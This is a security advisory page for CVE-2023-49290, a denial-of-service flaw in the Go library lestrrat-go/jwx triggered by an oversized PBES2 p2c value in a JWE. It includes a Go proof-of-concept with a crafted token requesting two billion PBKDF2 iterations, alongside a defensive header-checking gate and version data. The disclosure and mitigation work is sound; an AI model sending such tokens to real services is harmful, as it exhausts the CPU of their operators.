Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA
lestrrat-go/jwx's malicious parameters in JWE can cause a DOS
Summary
An excessively large p2c parameter in a JWE using one of the PBES2-* key management algorithms can cause a denial of service (DoS) on the recipient.
Details
The JWE key management algorithms based on PBKDF2 (PBES2-HS256+A128KW, PBES2-HS384+A192KW and PBES2-HS512+A256KW) require a JOSE header parameter called p2c (PBES2 Count). This parameter dictates the number of PBKDF2 iterations used to derive the key that wraps the CEK. Its primary purpose is to intentionally slow down the key derivation function, making password brute-force and dictionary attacks more resource-intensive.
Because p2c is taken from the protected header, and the header's integrity can only be checked after the wrapping key has been derived and the CEK unwrapped, the recipient performs the requested iterations before anything about the token has been authenticated. An attacker can therefore set p2c to a very large value and force every decryption attempt to burn that much CPU, resulting in a DoS.
PoC
```go
package main

import (
	"fmt"
	"log"

	"github.com/lestrrat-go/jwx/v2/jwa"
	"github.com/lestrrat-go/jwx/v2/jwe"
	"github.com/lestrrat-go/jwx/v2/jwk"
)

func main() {
	// Compact JWE whose protected header decodes to
	// {"alg":"PBES2-HS256+A128KW","enc":"A256GCM","p2c":2000000000,"p2s":"M773JyfWle_alIsksCNMOA"}
	// i.e. it asks the recipient for 2,000,000,000 PBKDF2 iterations.
	token := []byte("eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMjU2R0NNIiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJNNzczSnlmV2xlX2FsSXNrc0NOTU9BIn0=.S8B1kXdIR7BM6i_TaGsgqEOxU-1Sgdakp4mHq7UVhn-_REzOiGz2gg.gU_LfzhBXtQdwYjh.9QUIS-RWkLc.m9TudmzUoCzDhHsGGfzmCA")

	// Any password will do: the iterations are spent deriving the wrapping
	// key before the token can fail authentication.
	key, err := jwk.FromRaw([]byte(`abcdefg`))
	if err != nil {
		log.Fatal(err)
	}

	// On affected versions this call runs all 2e9 iterations before returning.
	payload, err := jwe.Decrypt(token, jwe.WithKey(jwa.PBES2_HS256_A128KW, key))
	if err == nil {
		fmt.Println(string(payload))
	}
}
```
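A caller-side gate for the behaviour described under Details, added here as an example; it is not code from this advisory or from lestrrat-go/jwx. It decodes only the protected header of a compact JWE (no cryptography, so it is safe on untrusted input) and refuses to hand the token to jwe.Decrypt when alg is a PBES2 variant and p2c is missing, non-integer, non-positive, or above a cap. The cap MaxP2C = 10000, the constructedToken helper and the placeholder segments it appends after the header are assumptions for this example; the first token exercised is the PoC token from this advisory.

```go
package main

import (
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// MaxP2C is the largest PBES2 iteration count this gate accepts. The value
// is an assumption for this example: derive it from the CPU budget you are
// willing to spend on one inbound token, not from any library default.
const MaxP2C int64 = 10000

// ErrP2CTooLarge is returned when the header asks for more than MaxP2C iterations.
var ErrP2CTooLarge = errors.New("p2c exceeds configured maximum")

// PBES2Header is the subset of protected-header fields the gate inspects.
// P2C is int64 so that a non-integer value (1e18, "2000", true) fails to
// unmarshal instead of being coerced.
type PBES2Header struct {
	Alg string `json:"alg"`
	Enc string `json:"enc"`
	P2C int64  `json:"p2c"`
	P2S string `json:"p2s"`
}

// ParseProtectedHeader decodes the first segment of a compact JWE.
func ParseProtectedHeader(token string) (*PBES2Header, error) {
	first, _, ok := strings.Cut(token, ".")
	if !ok {
		return nil, errors.New("not a compact JWE: no '.' separator")
	}
	// RFC 7515 forbids '=' padding in JOSE segments; the PoC token on this
	// page carries one, so padding is tolerated here rather than rejected.
	raw, err := base64.RawURLEncoding.DecodeString(strings.TrimRight(first, "="))
	if err != nil {
		return nil, fmt.Errorf("protected header is not base64url: %w", err)
	}
	var h PBES2Header
	if err := json.Unmarshal(raw, &h); err != nil {
		return nil, fmt.Errorf("protected header is not valid JSON: %w", err)
	}
	return &h, nil
}

// CheckPBES2Cost returns the parsed header if the token is acceptable to
// decrypt, or an error saying why it must be dropped. Tokens whose alg is
// not a PBES2 variant pass through unchanged: p2c is meaningless for them.
func CheckPBES2Cost(token string, max int64) (*PBES2Header, error) {
	h, err := ParseProtectedHeader(token)
	if err != nil {
		return nil, err
	}
	if !strings.HasPrefix(h.Alg, "PBES2-") {
		return h, nil
	}
	if h.P2S == "" {
		return nil, errors.New("PBES2 header is missing p2s")
	}
	if h.P2C <= 0 {
		return nil, fmt.Errorf("p2c must be a positive integer, got %d", h.P2C)
	}
	if h.P2C > max {
		return nil, fmt.Errorf("%w: p2c=%d, max=%d", ErrP2CTooLarge, h.P2C, max)
	}
	return h, nil
}

// PoCToken is the compact JWE from the advisory's PoC above (p2c = 2000000000).
const PoCToken = "eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMjU2R0NNIiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJNNzczSnlmV2xlX2FsSXNrc0NOTU9BIn0=.S8B1kXdIR7BM6i_TaGsgqEOxU-1Sgdakp4mHq7UVhn-_REzOiGz2gg.gU_LfzhBXtQdwYjh.9QUIS-RWkLc.m9TudmzUoCzDhHsGGfzmCA"

// constructedToken builds a compact-JWE-shaped string from a raw header JSON
// for exercising the gate. The four segments after the header are
// placeholders, not real ciphertext (constructed test input, assumption).
func constructedToken(headerJSON string) string {
	return base64.RawURLEncoding.EncodeToString([]byte(headerJSON)) + ".AAAA.AAAA.AAAA.AAAA"
}

func main() {
	cases := []struct{ name, token string }{
		{"advisory PoC, p2c=2000000000", PoCToken},
		{"constructed, p2c=4096", constructedToken(`{"alg":"PBES2-HS256+A128KW","enc":"A256GCM","p2c":4096,"p2s":"c2FsdHNhbHQ"}`)},
		{"constructed, p2c=1e18", constructedToken(`{"alg":"PBES2-HS256+A128KW","enc":"A256GCM","p2c":1e18,"p2s":"c2FsdHNhbHQ"}`)},
		{"constructed, non-PBES2 alg", constructedToken(`{"alg":"dir","enc":"A256GCM"}`)},
	}
	for _, c := range cases {
		if _, err := CheckPBES2Cost(c.token, MaxP2C); err != nil {
			fmt.Printf("%-30s REJECT: %v\n", c.name, err)
		} else {
			fmt.Printf("%-30s ok, safe to pass to jwe.Decrypt\n", c.name)
		}
	}
}
```

Run the gate before jwe.Decrypt on every inbound token. It is worth keeping even after upgrading to a fixed release, since a library-wide ceiling cannot know how much PBKDF2 work a particular service can afford per request.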
Impact
This is a denial-of-service issue: a recipient that decrypts attacker-supplied JWE tokens can be made to consume an excessive amount of CPU.
Permalink: https://github.com/advisories/GHSA-7f9x-gw85-8grf
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 12 months ago
Updated: 10 months ago
CVSS Score: 5.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Identifiers: GHSA-7f9x-gw85-8grf, CVE-2023-49290
References:
- https://github.com/lestrrat-go/jwx/security/advisories/GHSA-7f9x-gw85-8grf
- https://nvd.nist.gov/vuln/detail/CVE-2023-49290
- https://github.com/lestrrat-go/jwx/commit/64f2a229b8e18605f47361d292b526bdc4aee01c
- https://github.com/advisories/GHSA-7f9x-gw85-8grf
Blast Radius: 18.3
Affected Packages
go:github.com/lestrrat-go/jwx/v2
Dependent packages: 439
Dependent repositories: 301
Downloads:
Affected Version Ranges: < 2.0.18
Fixed in: 2.0.18
All affected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.0.10, 2.0.11, 2.0.12, 2.0.13, 2.0.14, 2.0.15, 2.0.16, 2.0.17
All unaffected versions: 2.0.18, 2.0.19, 2.0.20, 2.0.21, 2.1.0, 2.1.1, 2.1.2, 2.1.3
go:github.com/lestrrat-go/jwx
Dependent packages: 1,295
Dependent repositories: 2,884
Downloads:
Affected Version Ranges: < 1.2.27
Fixed in: 1.2.27
All affected versions: 0.9.0, 0.9.1, 0.9.2, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5, 1.1.6, 1.1.7, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.5, 1.2.6, 1.2.7, 1.2.8, 1.2.9, 1.2.10, 1.2.11, 1.2.12, 1.2.13, 1.2.14, 1.2.15, 1.2.16, 1.2.17, 1.2.18, 1.2.19, 1.2.20, 1.2.21, 1.2.22, 1.2.23, 1.2.24, 1.2.25, 1.2.26
All unaffected versions: 1.2.27, 1.2.28, 1.2.29, 1.2.30